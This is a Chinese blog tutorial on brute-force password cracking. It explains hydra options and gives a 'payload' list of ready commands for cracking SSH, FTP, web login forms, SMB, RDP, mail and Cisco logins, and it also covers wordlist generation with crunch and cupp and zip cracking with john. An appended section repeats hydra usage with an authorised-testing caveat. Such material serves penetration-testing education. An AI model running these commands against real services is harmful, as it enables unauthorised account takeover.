hydra-字典暴力破解

暴力破解与字典生成工具详解

0x00 暴力破解简介

暴力破解是指通过反复试错的方法来尝试破解密码或用户名。.
这是一种较老的攻击方法。在许多场景任然是比较好的方法,今天更新一篇关于字典以及暴力破解随笔

0x01 字典介绍

生成字典的方法以及工具都有很多,字典的高效在于字典所储存内容对即将要破解的对象的敏感性大不大,当然一个10T容量的字典,当然是储存的东西非常多无所不能,但是还是不太切换实际,更多需要高效性。字典网上有很多,也可以根据特点来生成相对应特征的字典提高破解效率,下面简单介绍一下字典以及工具。

0x02 爆破工具 kaili-hydra

1)kali爆破神器----hydra
这是一款强大的爆破工具,结合相关的字典可以发挥出高效的作用

参数:
-l:指定单个用户名,适合在知道用户名爆破用户名密码时使用
-L 指定多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径)
-p 指定单个密码,适合在知道密码爆破用户名时使用
-P 指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议为绝对路径)
-C 当用户名和密码存储到一个文件时使用此参数,字典存储的格式必须为 “用户名:密码” 的格式。
-M 指定多个攻击目标,此参数为存储攻击目标的文件的路径(建议为绝对路径)。注意:列表文件存储格式必须为 “地址:端口”
-t 指定爆破时的任务数量(可以理解为线程数),默认为16
-s 指定端口,适用于攻击目标端口非默认的情况。例如:http服务使用非80端口
-S 指定爆破时使用 SSL 链接
-R 继续从上一次爆破进度上继续爆破
-v/-V 显示爆破的详细信息
-f 一但爆破成功一个就停止爆破 server 代表要攻击的目标(单个),多个目标时请使用

> payload:

1、破解ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra
-l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp: hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l
用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get
/admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get
/admin/index.php

4、post方式提交,破解web登录: hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form
“/admin/login.php:username=USER&password=PASS&submit=login:sorry
password” hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18
http-post-form “login.php:id=USER&passwd=PASS:wrong<br/> username or password
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。)

5、破解https: hydra -m /index.php -l muts -P pass.txt 1.1.1.1 https

6、破解teamspeak: hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco: hydra -P pass.txt 1.1.1.1 cisco hydra -m cloud -P
pass.txt 1.1.1.1 cisco-enable

8、破解smb: hydra -l administrator -P pass.txt 1.1.1.1 smb

9、破解pop3: hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp: hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy: hydra -l admin -P pass.txt http-proxy://1.1.1.1

12、破解imap: hydra -L user.txt -p secret1.1.1.1 imap PLAIN hydra -C
defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

kali爆破压缩包密码: zip2john yasuobao.zip >> passwd.txt #生成压缩包hash john
passwd.txt #查看解密hash

0x03 字典生成工具

kali-crunch
根据密码特性生成对应字典
例:crunch 最小位 最大位 -t 条件 %%%(数字) -o 输出位置
kali-cupp
cupp可交互式字典生成,可以根据相关的要求去制作一个相关内容格式的字典,制作特定字典提高破解效率

windows字典生成工具有很多这里我介绍一个交互式生成工具,或许有更好的工具供大家去使用

交互式字典生成

### 使用 Hydra 工具进行密码破解 Hydra 是一款强大的网络登录破解工具,在 Kali Linux 中默认已预装。该工具支持多种协议的服务破解,包括但不限于 FTP、HTTP、HTTPS、Telnet 和 SSH。 #### 安装与验证 确认 Hydra 是否已安装可以通过命令 `hydra -h` 来查看帮助文档[^1]: ```bash hydra -h ``` 若未安装,则可通过 APT 包管理器来获取并安装最新版本的 Hydra: ```bash sudo apt update && sudo apt install hydra-gtk ``` #### 基本语法结构 Hydra 的基本命令格式如下所示: ```plaintext hydra [-l LOGIN|-L FILE] [-p PASS|-P FILE] [OPTIONS...] server service ``` 其中 `-l` 或者 `-L` 参数用于指定单个用户名或者是包含多个用户名列表文件;而 `-p` 或者 `-P` 则对应于单一密码或是密码字典文件路径。服务名称可以是 http-post-form, ssh, ftp 等等。 #### 实际案例演示 假设要针对 HTTP 表单认证执行暴力破解攻击测试(仅限合法授权环境内),可按照下面的方式构建命令: ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" ``` 这条指令表示使用名为 "admin" 的账户名以及 rockyou 字典去尝试访问 IP 地址为 192.168.1.100 的 web 应用程序 `/login.php` 登录页面,并且当返回字符串含有 "incorrect" 时认为此次提交失败。 #### 提高效率技巧 为了提高工作效率,建议先收集尽可能多的有效账号信息作为输入源,减少不必要的猜测次数。另外也可以通过设置线程数 (`-t`) 加快速度,但需注意过高的并发量可能会引起目标服务器拒绝服务的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值